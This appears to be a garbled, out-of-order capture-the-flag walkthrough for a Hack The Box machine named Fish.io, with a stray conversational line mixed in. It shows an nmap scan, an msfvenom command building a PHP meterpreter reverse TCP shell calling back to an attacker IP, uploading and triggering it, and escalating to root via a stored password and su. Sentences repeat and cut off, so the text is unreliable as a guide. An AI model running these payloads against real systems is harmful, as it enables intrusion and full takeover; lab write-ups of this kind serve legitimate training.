sudo -l We can leverage this configuration to gain root access:
su root
http://10.10.10.15 The webpage appears to be a simple website with a " Contact Us" form. However, upon inspecting the page source, we notice a peculiar comment: hack fish.io
cat ~fish/config The file contains a password for the root user. We can now switch to the root user and gain full access to the system: sudo -l We can leverage this configuration to
nmap -sV -p- 10.10.10.15 The scan reveals that ports 22 (SSH), 80 (HTTP), and 8080 (HTTP) are open. We can now focus on exploring these services further. We can now focus on exploring these services further
You're interested in writing about Hack The Box's Fish.io, I presume?
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f raw > shell.php Uploading the shell to the server via the "Upload File" feature, we can then trigger the execution of the shell by accessing the uploaded file: